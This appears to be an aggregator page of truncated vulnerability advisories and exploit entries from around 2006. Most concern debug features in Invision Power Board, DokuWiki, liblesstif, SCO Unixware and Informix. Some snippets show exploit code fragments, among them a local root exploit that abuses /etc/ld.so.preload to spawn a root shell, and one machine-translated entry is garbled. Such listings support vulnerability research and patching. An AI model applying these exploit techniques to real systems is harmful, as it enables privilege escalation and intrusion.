Invision Power Board 2.1.7 - Debug Remote Password Change

Invision Power Board 2.1.7 - Debug Remote Password Change INSERT INTO \w?regantispam \regid,regcode,ipaddress,ctime\ VALUES\'\w32?',\d?,/', $page, $regs $prefix = $regs1; $regid = $regs2; $regcode = $regs3; else $suffix = "&debug=1"; $curl = curlinit$site.'act=Reg&CODE=10'.$suffix;...

SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit

No description provided by source. / SCO Unixware 7.1.3 ptrace local root exploit ============================================ SCO Unixware 7.1.3 kernel allows unprivledged users to debug binaries. The condition can be exploited by an attacker when he has execute permissions to a file which has t...

liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit

No description provided by source. !/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c EOF include unistd.h void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload"; execl"/bin/bash",...

FreeBSD : dokuwiki -- multiple vulnerabilities (fcba5764-506a-11db-a5ae-00508d6a62df)

Secunia reports : rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the 'TARGETFN' parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via director...

[SA22041] Fi Win WiFi Phone SS28S Debug Console Security Issue

---------------------------------------------------------------------- Want to work within IT-Security? Secunia is expanding its team of highly skilled security experts. We will help with relocation and obtaining a work permit. Currently the following type of positions are available:...

FiWin SS28S Wi-Fi phones backdoor account

Phone has debug console with telnet access and hardcoded account 1 with password 1...

Free kill often with a few important tools-vulnerability warning-the black bar safety net

C32Asm V0. 4. 1 2 C32Asm is set reverse assemble, 1 6 hex tools, Hiew modify the features and integration PE Explorer 1.98 Powerful resource tool, can directly Browse and modify the software resources, including menus, dialog boxes, string tables, etc.; in addition, also equipped with W32DASM...

BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion

Title : Bcwb 0.99rootpathRemote File Include Vulnerability Author : ajann Greetz : shadow and Suskun for host : Exploit; File startup.inc.php /File Code,1 startup.inc.php Error: .. .... // Debug services include$rootpath.'include/startup/debug.inc.php';...

CVE-2006-4679

DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...

CVE-2006-4679

DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...

CVE-2006-4679

DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...

CVE-2006-4679

DokuWiki prior to 2006-03-09c is vulnerable: it enables the debug feature by default, allowing remote attackers to obtain sensitive information via doku.php when the X-DOKUWIKI-DO header is set to "debug". The issue is confirmed across multiple sources (NVD/OpenVAS/Gentoo GLSA). A remediation bar...

CVE-2006-4679

DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...

CVE-2006-4679

DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...

dokuwiki -- multiple vulnerabilities

Secunia reports: rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "TARGETFN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory...

DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution

!/usr/bin/php -q -d shortopentag=on ? printr' -------------------------------------------------------------------------------- DokuWiki = 2006-03-09b release /bin/dwpage.php remote commands execution xploit by rgod [email protected] site: http://retrogod.altervista.org dork: "Driven by DokuWiki"...

J. River Media Center 11.0.309 - Remote Denial of Service (PoC)

!/usr/bin/perl Credit to n00b for finding this bug..^ ^ Media Center 11 d0s exploit overly long string. TiVo server plugin..Runs on port tcp :8070 Also J. River UPnP Server Version 1.0.34 is also afected by the same bug which is just a dos exploit.As we know the port always changes for the UPnP...

osCommerce 2.1/2.2 - 'product_info.php' SQL Injection

source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent...

CVE-2006-3859

IBM Informix Dynamic Server IDS allows remote authenticated users to create and overwrite arbitrary files via the 1 LOTOFILE and 2 trltracefileset functions, and the 3 "SET DEBUG FILE" commands...

CVE-2006-3860

IBM Informix Dynamic Server IDS before 9.40.xC7 and 10.00 before 10.00.xC3 allows allows remote authenticated users to execute arbitrary commands via the 1 "SET DEBUG FILE" SQL command, and the 2 startonpload and 3 dbexp functions...